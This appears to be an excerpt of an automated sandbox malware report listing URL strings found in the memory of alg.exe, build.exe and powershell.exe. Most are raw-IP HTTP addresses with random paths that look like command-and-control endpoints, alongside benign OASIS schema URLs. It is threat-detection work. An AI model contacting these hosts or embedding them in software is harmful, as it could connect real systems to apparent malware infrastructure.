Source: alg.exe, 00000009.00000003.3220609083.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3209760025.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3230534446.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3239370210.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3221929509.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3232490363.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3218423804.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3208238740.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://35.164.78.200/yavfpoeui
Source: alg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2718655052.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725466664.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://35.164.78.200:80/oiwersrybtP
Source: alg.exe, 00000009.00000003.3220609083.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3209760025.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3218423804.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3208238740.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://35.164.78.200:80/vjmakoegwejtsrokQ
Source: alg.exe, 00000009.00000003.3208238740.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://35.164.78.200:80/yavfpoeu
Source: alg.exe, 00000009.00000003.3119389154.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3135716796.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3156257212.00000000005A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.213.104.86/gblimgnlscyku
Source: alg.exe, 00000009.00000003.3298047259.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3299229753.00000000005A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.213.104.86/kpiticjpb
Source: alg.exe, 00000009.00000003.2963627341.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2953099038.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2946405217.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2975335028.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.213.104.86/ksvtsxsnb
Source: alg.exe, 00000009.00000003.2963627341.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2953099038.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.213.104.86/ohpP
Source: alg.exe, 00000009.00000003.3120774885.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.213.104.86:80/gblimgnlscyku
Source: alg.exe, 00000009.00000003.3298047259.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.213.104.86:80/kpiticjpb
Source: alg.exe, 00000009.00000003.2963959260.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2953099038.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2975335028.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.213.104.86:80/ohpm
Source: alg.exe, 00000009.00000002.3323934646.000000000053D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/
Source: alg.exe, 00000009.00000002.3323934646.000000000053D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/P
Source: alg.exe, 00000009.00000003.3135716796.00000000005A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/bdsoixvaivcS
Source: alg.exe, 00000009.00000003.3256074527.000000000058B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3232490363.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3253000018.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3290510552.000000000058C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3306777601.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3220609083.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000002.3323934646.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3298047259.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3230534446.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3239370210.000000000058A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/cgofyarxpklm/
Source: alg.exe, 00000009.00000003.2690389382.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/iafrakxbkhxwqod
Source: alg.exe, 00000009.00000002.3323934646.000000000053D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/ngs;W
Source: alg.exe, 00000009.00000002.3323934646.000000000053D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/p
Source: alg.exe, 00000009.00000003.3220609083.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3230534446.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3221929509.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3232490363.000000000057B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/wcihxthpb
Source: alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2946405217.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/wgcbdp
Source: alg.exe, 00000009.00000002.3323934646.000000000053D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000002.3323934646.0000000000503000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/wrjeoyp
Source: alg.exe, 00000009.00000002.3323934646.000000000053D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/wrjeoyp-P
Source: alg.exe, 00000009.00000002.3323934646.00000000005AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/wrjeoypN
Source: alg.exe, 00000009.00000003.2690389382.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105:80/iafrakxbkhxwqoTiPMbB
Source: alg.exe, 00000009.00000003.2194293396.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2196926107.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2211690726.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2204873392.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2210828989.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105:80/ojwgmwlrsgrxkodiMbB
Source: alg.exe, 00000009.00000003.2587369712.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2605900173.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2621710164.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2613582337.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105:80/wbpbmvhlbkm
Source: alg.exe, 00000009.00000003.3220609083.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105:80/wcihxtasecofgds
Source: alg.exe, 00000009.00000003.2963959260.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2953099038.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2946405217.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2975335028.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105:80/wgcbdp
Source: alg.exe, 00000009.00000002.3323934646.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105:80/wrjeoyp
Source: alg.exe, 00000009.00000003.2990795352.0000000000596000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://47.129.31.212/
Source: alg.exe, 00000009.00000003.3050069889.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3047643251.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3079434309.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3030359798.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3058249726.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3019315965.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3019611189.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3078569820.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3061259113.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3031391633.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://47.129.31.212/hbnyekwgryhvrr
Source: alg.exe, 00000009.00000003.2559065749.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2560073777.000000000055D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://47.129.31.212/hqlbcdtcv
Source: alg.exe, 00000009.00000003.2963627341.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2953099038.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2946405217.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2975335028.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://47.129.31.212/kjqwmlcq-
Source: alg.exe, 00000009.00000003.3256074527.000000000058B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3232490363.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3253000018.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3290510552.000000000058C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3306777601.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3218423804.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3220609083.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000002.3323934646.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3298047259.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3208148211.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3230534446.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3239370210.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3209760025.000000000058A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://47.129.31.212/nqyrhhrsxbrr
Source: alg.exe, 00000009.00000003.3050069889.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3003198758.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2990795352.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3047643251.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3079434309.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3030359798.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3058249726.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2992177955.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3019315965.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3019611189.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3078569820.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3061259113.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3003545643.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3031391633.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://47.129.31.212/vnjrxnyhwihcgZ
Source: alg.exe, 00000009.00000003.2560073777.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2559065749.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://47.129.31.212:80/hqlbcdtcv
Source: alg.exe, 00000009.00000003.2963959260.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2953099038.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2946405217.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://47.129.31.212:80/kjqwmlcqcb
Source: alg.exe, 00000009.00000003.3048558345.000000000056E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://47.129.31.212:80/vnjrxnyhwihcgU
Source: alg.exe, 00000009.00000003.2159848460.000000000053D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/
Source: alg.exe, 00000009.00000002.3323934646.000000000053D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/P
Source: alg.exe, 00000009.00000003.3290510552.000000000058C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3306777601.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000002.3323934646.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3298047259.000000000058A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/cdpttgyexqrsd
Source: alg.exe, 00000009.00000003.3156257212.00000000005A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/docjrpuoliwS
Source: alg.exe, 00000009.00000003.2159848460.000000000053D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/kW
Source: alg.exe, 00000009.00000003.2159848460.000000000053D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/mxhgf
Source: alg.exe, 00000009.00000003.2159848460.000000000053D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/mxhgfPP
Source: alg.exe, 00000009.00000003.2811149563.000000000057A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/scs
                            Source: alg.exe, 00000009.00000003.3290510552.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3291773572.00000000005A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/tckhwxqtj
                            Source: alg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2718655052.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2744860394.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2811149563.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2726765067.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2768613145.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725466664.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2739777279.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2756206332.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2709340960.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2946405217.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2745831053.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2740295647.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ucrfyypmempwnd
                            Source: alg.exe, 00000009.00000003.3270342995.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/cdpttgyexq
                            Source: alg.exe, 00000009.00000003.3156928709.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/docjrpuoliw?cP
                            Source: alg.exe, 00000009.00000003.2756641044.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/khpdqtysqhgfP
                            Source: alg.exe, 00000009.00000002.3323934646.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/mvgpsfdcrvitryoo
                            Source: alg.exe, 00000009.00000003.2709340960.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/ucrfyypmempwnm
                            Source: alg.exe, 00000009.00000003.2464247908.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/dmaeaf#J
                            Source: alg.exe, 00000009.00000003.2587369712.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2605900173.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576145561.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2560073777.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2621710164.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2634085222.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2613582337.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544401185.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544895268.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2559065749.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2575063402.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576692201.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/gocchgnxicko%
                            Source: alg.exe, 00000009.00000003.2444067771.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2465112671.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2464247908.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/mgu
                            Source: alg.exe, 00000009.00000003.2587369712.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2605900173.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576145561.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2560073777.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2613582337.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544401185.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2504415483.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544895268.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2559065749.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2575063402.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576692201.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/vpujdohccl
                            Source: alg.exe, 00000009.00000003.2464247908.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2560073777.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544401185.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2504415483.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544895268.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2465112671.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2559065749.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/dmaeaf
                            Source: alg.exe, 00000009.00000003.2544401185.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/gocchgnxicko
                            Source: alg.exe, 00000009.00000003.2464247908.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2560073777.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544401185.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2504415483.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544895268.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2465112671.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2559065749.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2575063402.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2444067771.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/mgu
                            Source: alg.exe, 00000009.00000003.2544401185.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2504415483.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/vpujdohccl
                            Source: alg.exe, 00000009.00000003.3156928709.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3048558345.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3169068917.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3060374401.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2975335028.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3120774885.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140/hdqasqyy
                            Source: alg.exe, 00000009.00000003.2975335028.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140:80/hdqasqyycb
                            Source: powershell.exe, 0000000A.00000002.2215859969.00000000072E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsn
                            Source: powershell.exe, 0000000A.00000002.2215859969.0000000007301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                            Source: powershell.exe, 0000000A.00000002.2208880133.000000000581D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
